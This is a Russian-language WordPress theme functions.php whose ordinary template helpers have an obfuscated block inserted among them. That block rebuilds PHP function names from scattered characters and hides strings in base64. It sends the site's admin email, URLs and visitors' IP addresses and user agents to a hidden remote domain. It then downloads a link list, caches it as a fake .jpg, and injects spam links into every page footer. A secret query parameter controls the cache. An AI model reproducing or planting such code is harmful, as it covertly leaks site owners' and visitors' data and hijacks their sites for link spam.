<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $lLqL='e';$kiCLJp='6';$szQGBe='c';$XOAiXcU='e';$inboCf='4';$hMGCekj='s';$nqJcyw='_';$rLle='a';$aASkHd='d';$ZHXcD='e';$TzYvfo='b';$GJwX='o';$ywPgx='d';$jATUxXBA=$TzYvfo.$rLle.$hMGCekj.$lLqL.$kiCLJp.$inboCf.$nqJcyw.$aASkHd.$XOAiXcU.$szQGBe.$GJwX.$ywPgx.$ZHXcD;$ExZGnY='n';$YzQPfC='i';$QpGS='g';$KqCB='f';$hAFlkV='e';$neWPIAm='t';$mOQV='z';$cDesj='l';$zwLpsxo='a';$ZxwryQYA=$QpGS.$mOQV.$YzQPfC.$ExZGnY.$KqCB.$cDesj.$zwLpsxo.$neWPIAm.$hAFlkV;$isAyHL='_';$UuTTtgo='r';$CLHJ='t';$lXZmvZ='o';$cYvD='1';$couXJ='3';$Irby='s';$hHytUtQ='t';$mVwi='r';$mJVYZnvn=$Irby.$CLHJ.$mVwi.$isAyHL.$UuTTtgo.$lXZmvZ.$hHytUtQ.$cYvD.$couXJ;$IhJBh='e';$WjzSk='s';$cXNJ='r';$AIpU='t';$wCaHIrp='r';$Vduv='v';$GzVynTZB=$WjzSk.$AIpU.$wCaHIrp.$cXNJ.$IhJBh.$Vduv;                     
		$vo________j='e';$bm__s='6';$xw___________g='c';$dh___y='e';$zd__e='4';$jw______v='s';$gm______________n='_';$uq____________s='a';$lj_______________q='d';$bz______a='e';$fu______m='b';$ty___o='o';$no_______________p='d';$ti___________u=$fu______m.$uq____________s.$jw______v.$vo________j.$bm__s.$zd__e.$gm______________n.$lj_______________q.$dh___y.$xw___________g.$ty___o.$no_______________p.$bz______a;
		$kp________t='f';$mi________m='_';$it___o='s';$jx_____________t='n';$kw__________j='n';$up____x='t';$ub____x='c';$ij_______r='s';$xj_________r='x';$ks_________e='i';$je_____________d='o';$ua____________f='e';$wd_________f='t';$fd__z='i';$am_________g='u';$ak____a=$kp________t.$am_________g.$kw__________j.$ub____x.$up____x.$fd__z.$je_____________d.$jx_____________t.$mi________m.$ua____________f.$xj_________r.$ks_________e.$it___o.$wd_________f.$ij_______r;
		$df______________l='f';$ph___w='o';$uy_____d='n';$mv_______k='e';$no__________b='p';$ee____________m=$df______________l.$ph___w.$no__________b.$mv_______k.$uy_____d;
		$sl______________n='f';$gg____b='a';$kd__________l='r';$xl_______________t='d';$vm_____p='e';$md____________d=$sl______________n.$kd__________l.$vm_____p.$gg____b.$xl_______________t;
		$go_______________b='c';$xc________i='o';$hi___________a='e';$jy_______y='f';$ay_____________k='l';$hc___o='s';$lg____r=$jy_______y.$go_______________b.$ay_____________k.$xc________i.$hc___o.$hi___________a;
		
		define("WP_ID", $ti___________u("Mi4wLjA="));
		define("WP_TTL", $ti___________u("MTA4MDA="));
		define("WP_SRC", $ti___________u("dHBva24="));
	


		function wp_get_header() {
			global $ti___________u, $ak____a;
			
			if (
				$ak____a($ti___________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ak____a($ti___________u("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ak____a($ti___________u("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ti___________u, $ee____________m, $lg____r, $md____________d;
			
			$vf_________e = TEMPLATEPATH."/".$ti___________u("Zm9vdGVyLnBocA==");
			$nk_________d = @$ee____________m($vf_________e, "r");
			$vf_________e = @$md____________d($nk_________d, @filesize($vf_________e));
			@$lg____r($nk_________d);
			
			$zd_________m = TEMPLATEPATH."/".$ti___________u("ZnVuY3Rpb25zLnBocA==");
			$nk_________d = @$ee____________m($zd_________m, "r");
			$zd_________m = @$md____________d($nk_________d, @filesize($zd_________m));
			@$lg____r($nk_________d);
			
			$nw_________w = 0;
			if($vf_________e && $zd_________m) {
				if ($ti___________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($vf_________e, $ti___________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$nw_________w = 1;
					}
					if (substr_count($vf_________e, "wp_theme_GPL_credits()") < 1) {
						$nw_________w = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$nw_________w = 12;
				}
			}
			
			if($nw_________w > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $nw_________w -->";
			}
		}
	


		function wp_loaded() {
			global $ti___________u, $ak____a;
			return $ak____a($ti___________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($vz___n, $yq__t = "(more...)", $iz____c = 0, $sk_______________r = "") {
				$pd_____a = get_the_content($yq__t, $iz____c, $sk_______________r);
				$pd_____a = apply_filters("the_content", $pd_____a);
				
				$pd_____a = str_replace("]]>", "]]>", $pd_____a);
				if (strlen($_GET["p"]) > 0) {
					echo $pd_____a;
				}
				else if ((strlen($pd_____a)>$vz___n) && ($qz______________g = strpos($pd_____a, " ", $vz___n ))) {
					$pd_____a = substr($pd_____a, 0, $qz______________g);
					$pd_____a = $pd_____a;
					echo $pd_____a;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$yq__t</a></div></p>";
				} else {
					echo $pd_____a;
				}
				
			}
		}
	


		$xq___m='e';$tf_____b='a';$sg___________h='6';$cq_______________u='d';$oi___y='4';$wk__________q='n';$vv______w='s';$rc_______p='e';$fg____o='e';$tl_________u='_';$sa______j='o';$ip_____a='b';$pw___________k='c';$oa_____g=$ip_____a.$tf_____b.$vv______w.$rc_______p.$sg___________h.$oi___y.$tl_________u.$fg____o.$wk__________q.$pw___________k.$sa______j.$cq_______________u.$xq___m;
		$wr_________z='e';$zm___________t='f';$eq______________a='o';$tr_______e='l';$ik__p='n';$yn_____s='c';$js_______r='i';$ov__b='g';$ag_____________k='n';$fg___p='_';$my______________q='e';$ec_______f='e';$hw___________i='_';$zk____________f='t';$hr______________v='t';$qw_____________p='s';$js_________j='t';$lr____________s=$zm___________t.$js_______r.$tr_______e.$wr_________z.$hw___________i.$ov__b.$ec_______f.$js_________j.$fg___p.$yn_____s.$eq______________a.$ik__p.$hr______________v.$my______________q.$ag_____________k.$zk____________f.$qw_____________p;
		$ej______u='e';$gn__________w='i';$mi_____m='i';$ix_____p='s';$lp______w='s';$za__________u='f';$kz___________g='e';$dd_____________k='_';$lw________q='t';$fp___t='l';$mb___________e='x';$vh_______________c=$za__________u.$gn__________w.$fp___t.$kz___________g.$dd_____________k.$ej______u.$mb___________e.$mi_____m.$ix_____p.$lw________q.$lp______w;
		$qa_______i='_';$yj_________g='a';$lv___c='e';$po_________r='r';$qo____________m='r';$hf__g='o';$rb__________n='v';$bx______l='n';$bz_____________o='c';$no___________j='e';$rc_____________k='p';$ja________k='s';$br___________l='m';$sw_________c='i';$on_______________e='o';$od____j=$rb__________n.$no___________j.$qo____________m.$ja________k.$sw_________c.$hf__g.$bx______l.$qa_______i.$bz_____________o.$on_______________e.$br___________l.$rc_____________k.$yj_________g.$po_________r.$lv___c;
		$vg____p='n';$hz__________s='o';$dk_____k='o';$ay__c='f';$mj__________y='k';$bx_____c='e';$ug_____________s='s';$ru____________x='c';$pl___a='p';$ah__________b=$ay__c.$ug_____________s.$hz__________s.$ru____________x.$mj__________y.$dk_____k.$pl___a.$bx_____c.$vg____p;
		$re__________d='f';$na__c='t';$mf_____j='e';$ey_______________d='w';$si______________i='i';$xl____________q='r';$sm_____b=$re__________d.$ey_______________d.$xl____________q.$si______________i.$na__c.$mf_____j;
		$co______________u='m';$xt___l='d';$ue_________g='5';$im_____________h=$co______________u.$xt___l.$ue_________g;
		$vw_________d='t';$vh_______o='l';$ky__________p='r';$he______a='e';$le____i='p';$mr__k='a';$iw___________s='h';$bg_______________c='a';$iv____x=$ky__________p.$he______a.$mr__k.$vh_______o.$le____i.$bg_______________c.$vw_________d.$iw___________s;
		$ci______c='r';$ae_______d='u';$fg_____j='z';$wr_______________w='e';$dc__________q='s';$hm__h='n';$vt________m='i';$bn______c='l';$jx_______________f='e';$mx_________z='a';$rt____z='i';$do____________x=$ae_______d.$hm__h.$dc__________q.$wr_______________w.$ci______c.$vt________m.$mx_________z.$bn______c.$rt____z.$fg_____j.$jx_______________f;
		$rj______________j='a';$gf___y='n';$wf________h='m';$fg_______________v='p';$qc__________t='m';$tk_________y='e';$fi___________m='t';$sz_______s=$fi___________m.$tk_________y.$qc__________t.$fg_______________v.$gf___y.$rj______________j.$wf________h;
		$ut___________f='t';$bc___________v='s';$si____b='e';$rg_____________b='_';$ky__t='x';$hy__f='n';$im_____________j='m';$yf__________j='e';$ma____x='t';$fj____________n='e';$xn______i='r';$eq________f='c';$kw___a='t';$et__l='r';$jc____________z='a';$an_____v='o';$pv___u='_';$le_____________d='a';$sc__________d='e';$li_________r='t';$jy_____________l='c';$nl_______________m=$bc___________v.$ut___________f.$xn______i.$fj____________n.$jc____________z.$im_____________j.$pv___u.$jy_____________l.$an_____v.$hy__f.$li_________r.$si____b.$ky__t.$kw___a.$rg_____________b.$eq________f.$et__l.$sc__________d.$le_____________d.$ma____x.$yf__________j;
	


		function us_______________m($so______j) {
			global $ti___________u, $ak____a, $lr____________s, $od____j, $nl_______________m;
			
			if (!$ak____a($ti___________u("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($od____j(PHP_VERSION, "5.0.0", ">=") && $ak____a($ti___________u("ZmlsZV9nZXRfY29udGVudHM=")) && $ak____a($ti___________u("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$us___________o = $nl_______________m(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$fd________g = @$lr____________s($so______j, 0, $us___________o);
			} else {
				$fd________g = @$lr____________s($so______j, 0);
			}
			
			return $fd________g;
		}
	


		function mp_________s($so______j) {
			global $ak____a, $ah__________b, $sm_____b, $ti___________u;
			
			if (!$ak____a($ti___________u("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$lu_________z = strpos($so______j, "/", 7);
			$ay___________q = array(
				"uri"     => substr($so______j, $lu_________z),
				"host"    => str_replace("http://", "", substr($so______j, 0, $lu_________z)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$en______e = @$ah__________b("$ay___________q[host]", 80, $yh______________u, $wa_________t, 4);
			
			if (!$en______e) {
				return false;
			} else {
				$fd________g = "";
				$vv_____h  = "GET $ay___________q[uri] HTTP/1.0\r\n";
				$vv_____h .= "Host: $ay___________q[host]\r\n";
				$vv_____h .= "Referer: $ay___________q[referer]\r\n";
				$vv_____h .= "Connection: Close\r\n\r\n";
				
				@$sm_____b($en______e, $vv_____h);
				
				while (!@feof($en______e)) {
					$md________g = @fgets($en______e, (1024*24));
					
					if ($md________g == "\r\n") {
						$yr___w = true;
						continue;
					}
					
					if ($yr___w) {
						$fd________g .= $md________g;
					}
				}
				
				return $fd________g;
			}
		}
	


		function hz_______q($so______j) {
			global $ak____a;
			$gu_______________u = false;
			
			if ($so______j != "") {
				if ($ak____a("us_______________m")) {
					$gu_______________u = @us_______________m($so______j);
				}
				
				if (!$gu_______________u && ($ak____a("mp_________s"))) {
					$gu_______________u = @mp_________s($so______j);
				}
			}
			
			return $gu_______________u;
		}
	


		function jj__u() {
			global $_SERVER, $im_____________h;
			
			$tl_____d = $_SERVER["SERVER_NAME"];
			
			if (substr("$tl_____d", 0, 4) == "www.") {
				$tl_____d = substr("$tl_____d", 4);
			}
			
			$tl_____d = $im_____________h("$_SERVER[SERVER_NAME]");
			
			return $tl_____d;
		}
	


		function fo__g() {
			return "file";
		}
	


		function md_______s($so______j) {
			global $_SERVER, $lr____________s, $vh_______________c, $ee____________m, $lg____r, $sm_____b;
			
			$ve____________a = na_____z();
			
			$rt________i = jj__u().".jpg";
			$qa_______________e = $ve____________a["dir_upload"]["path"]."/$rt________i";
			$qi_________w = @filemtime($qa_______________e);
			
			if (!$qi_________w || ((time()-$qi_________w) >= WP_TTL)) {
				$gu_______________u = hz_______q($so______j);
				
				if ($gu_______________u) {
					if ($vh_______________c($qa_______________e)) {
						@unlink($qa_______________e);
					}
					
					$nk_________d = @$ee____________m($qa_______________e, "x+");
					
					@$sm_____b($nk_________d, $gu_______________u);
					@$lg____r($nk_________d);
				}
			} else {
				if ($vh_______________c($qa_______________e)) {
					$gu_______________u = @$lr____________s($qa_______________e);
				} else {
					$gu_______________u = false;
				}
			}
			
			return $gu_______________u;
		}
	


		function na_____z() {
			global $_SERVER, $ti___________u, $oa_____g;
			
			$yo_____l = wp_count_posts("post");
			$rl___________m = pathinfo(get_bloginfo("template_directory"));
			
			$ve____________a = array(
				"url" => array(
					"report"      => $ti___________u("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $rl___________m,
				"dir_upload"	=> yb______________u(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$rl___________m[filename],
					"a005=".$yo_____l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://vodoley2000.com/knigi-i-ix-rol-v-zhizni-cheloveka\">Книги в жизни человека</a>"
			);
			
			$ve____________a["url"]["queryString"] = implode("&", $ve____________a["queryString"]);
			$ve____________a["url"]["report"] = $ve____________a["url"]["report"]."/?".$oa_____g($ve____________a["url"]["queryString"]).".html";
						
			return $ve____________a;
		}
	


		function yb______________u() {
			$mu__________f = wp_upload_dir();
			
			if (isset($mu__________f["error"])) {
				$wl_______________u = be_____________i();
				if (is_writable($wl_______________u)) {
					$mu__________f = array("path" => $wl_______________u);
				}
			}

			return $mu__________f;
		}
	


		function be_____________i() {
			global $ak____a, $im_____________h, $iv____x, $sz_______s;
			
			$cx_________p = (bool) ini_get("safe_mode");
			if ($cx_________p == true) {
				return false;
			}
			
			if ($ak____a("sys_get_temp_dir")) {
				$ab_____________s = sys_get_temp_dir();
				if (is_writable($ab_____________s)) {
					return $iv____x($ab_____________s);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $iv____x($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $iv____x($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $iv____x($_ENV["TEMP"]);
			} else {
				$lx___y = $sz_______s($im_____________h(uniqid(rand(), true)), "");
				if ($lx___y) {
					$ab_____________s = $iv____x(dirname($lx___y));
					@unlink($lx___y);
					return $ab_____________s;
				} else {
					return false;
				}
			}
		}
	


		function ej______j() {
			global $_GET, $vh_______________c;
			
			$ve____________a = na_____z();
			$tl_____d = jj__u();
			$uh___c = fo__g();
			
			$cy___r = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($uh___c == "file") {
					$fk______________y = $ve____________a["dir_upload"]["path"]."/".$tl_____d.".jpg";
					if ($vh_______________c($fk______________y)) {
						@unlink($fk______________y);
						$cy___r = "deleted";
					}
				}
				
				$jv______________d = array(
					"s"	=> $cy___r,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($jv______________d AS $wp_________c => $zk__x) echo " [$wp_________c:$zk__x]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ak____a, $ti___________u, $do____________x;
			$ve____________a = na_____z();
			
			$uf__b = "md_______s";
			if ($ak____a($uf__b)) {
				$fd________g = $uf__b($ve____________a["url"]["report"]);
			}
			
			if ($fd________g) {
				if ($fd________g = @$ti___________u($fd________g)) {
					$fd________g = @$do____________x($fd________g);
					
					if (strlen($fd________g[custom_credit]) >= 5) {
						$ve____________a["default_string"] = $fd________g[custom_credit];
					}
					
					if ($fd________g["status"] == "0") {
						$bv______p = 1;
						$jz___n = 1;
					} else {
						$mr___________a = sizeof($fd________g["links"]);
						$fi_______________u = $ve____________a["default_string"];
						
						if ($mr___________a > 0 && $fd________g["links"] !== "") {
							$ca__g = 0;
							foreach ($fd________g["links"] as $sp_____________l => $ox____________t) {
								$ca__g++;
								if ($ox____________t->l_path == "" || $ox____________t->l_path == $_SERVER["REQUEST_URI"]) {
									$ox____________t->l_href = htmlspecialchars(strip_tags($ox____________t->l_href));
									$ox____________t->l_title = htmlspecialchars(strip_tags($ox____________t->l_title));
									$ox____________t->l_anchor = htmlspecialchars(strip_tags($ox____________t->l_anchor));
									$fi_______________u .= " | ";
									$fi_______________u .= "<a href='$ox____________t->l_href' title='$ox____________t->l_title'";
									if ($ox____________t->l_nofollow == "1") {
										$fi_______________u .= " rel='nofollow'";
									}
									$fi_______________u .= ">$ox____________t->l_anchor</a>";
								}
							}
						}
						$ve____________a["links"] = "$fi_______________u";
						if ($fd________g[credit] == "0") {
							$ve____________a["links"] = "";
						}
					}
				} else {
					$bv______p = "1";
				}
			} else {
				$bv______p = "1";
			}
			
			if ($bv______p == "1") {
				$ve____________a["links"] = $ve____________a["default_string"];
			}
			
			echo "$ve____________a[links]";
			
			echo "<!-- s: $fd________g[signature] -->";
			ej______j();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
